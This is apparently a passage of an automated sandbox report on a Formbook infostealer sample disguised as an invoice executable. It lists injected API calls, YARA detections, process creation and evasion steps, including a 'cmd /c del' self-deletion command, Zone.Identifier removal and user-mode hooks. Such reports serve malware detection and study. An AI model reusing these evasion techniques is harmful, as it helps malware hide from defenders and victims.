          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0572B040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057298F0 NtReadVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057298A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0572A3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729A00 NtProtectVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034AA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034AB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034AA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034AA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034AAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009A9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009A9E90 NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009A9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009A9D5D NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009A9E8A NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009A9E0B NtReadFile,
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_00C70392
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_00C6E5D9
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE4340
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE2520
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE3018
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE5E00
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE4330
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DEA0AF
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE24A9
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE3012
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DEF988
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DEF981
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE7EA0
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE5DF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041D8D2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041E197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041D313
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00402D87
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00409E40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041D63C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00409E3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041DF97
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041DFAA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B2D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056FD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B25DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05712581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B1FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05706E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B2EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05704120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B28EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057120A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B20A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056FB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B2B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057ADBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B22AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03532B28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349EBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_035322AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346F900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03484120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03521002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0353E824
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_035328EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347B090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034920A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_035320A8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03531FF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352D616
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03486E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03532EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03531D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03532D07
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03460D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_035325DD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347D5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03492581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352D466
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009AE197
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_00992D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_00992D87
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_00999E3F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_00999E40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009ADF97
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_00992FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009ADFAA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0346B150 appears 35 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: String function: 056EB150 appears 35 times
          Source: PT300975-inv.exeBinary or memory string: OriginalFilename vs PT300975-inv.exe
          Source: PT300975-inv.exe, 00000000.00000002.345433163.0000000003039000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPe4.dll. vs PT300975-inv.exe
          Source: PT300975-inv.exe, 00000000.00000002.344599838.0000000000C52000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameuse5.exeH vs PT300975-inv.exe
          Source: PT300975-inv.exe, 00000000.00000002.345826499.0000000004021000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDESdgdhser.dll0 vs PT300975-inv.exe
          Source: PT300975-inv.exe, 00000000.00000002.346817865.00000000055B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs PT300975-inv.exe
          Source: PT300975-inv.exeBinary or memory string: OriginalFilenameuse5.exeH vs PT300975-inv.exe
          Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@5/3
          Source: C:\Users\user\Desktop\PT300975-inv.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PT300975-inv.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:724:120:WilError_01
          Source: PT300975-inv.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PT300975-inv.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\PT300975-inv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PT300975-inv.exeReversingLabs: Detection: 21%
          Source: unknownProcess created: C:\Users\user\Desktop\PT300975-inv.exe 'C:\Users\user\Desktop\PT300975-inv.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\PT300975-inv.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: PT300975-inv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PT300975-inv.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.364673964.0000000007AA0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: mscorsvw.exe, 00000002.00000002.385641930.00000000057DF000.00000040.00000001.sdmp, ipconfig.exe, 00000004.00000002.605193019.000000000355F000.00000040.00000001.sdmp
          Source: Binary string: mscorsvw.pdb source: ipconfig.exe, 00000004.00000002.605597251.000000000396F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: mscorsvw.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.364673964.0000000007AA0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE0B8C pushfd ; ret
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE3008 pushad ; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041CEB5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041CF6C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041CF02 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041CF0B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0573D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034BD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009AD856 push esi; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009ACEB5 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009ACF0B push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009ACF02 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009ACF6C push eax; ret

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\Desktop\PT300975-inv.exeFile opened: C:\Users\user\Desktop\PT300975-inv.exe:Zone.Identifier read attributes | delete
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xEE
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess information set: NOOPENFILEERRORBOX
